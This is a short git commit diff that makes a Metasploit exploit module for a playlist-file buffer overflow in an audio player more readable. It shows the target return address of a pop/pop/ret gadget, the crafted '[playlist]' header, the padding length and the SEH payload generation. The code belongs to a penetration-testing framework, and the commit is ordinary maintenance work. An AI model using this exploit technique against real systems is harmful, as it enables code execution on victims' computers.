Making audiotran_pls_1424 more readable and adding comments
parent
c60ea58257
commit
98958bc7bc
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r
|
||||
[ 'Windows Universal', { 'Ret' => 0x1001cd67 } ], #p/p/r from amp3dj.ocx
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 0))
|
||||
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
sploit = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D"
|
||||
sploit = "[playlist]\r\nFile1="
|
||||
sploit << rand_text_alpha_upper(1940)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
|
Loading…
Reference in New Issue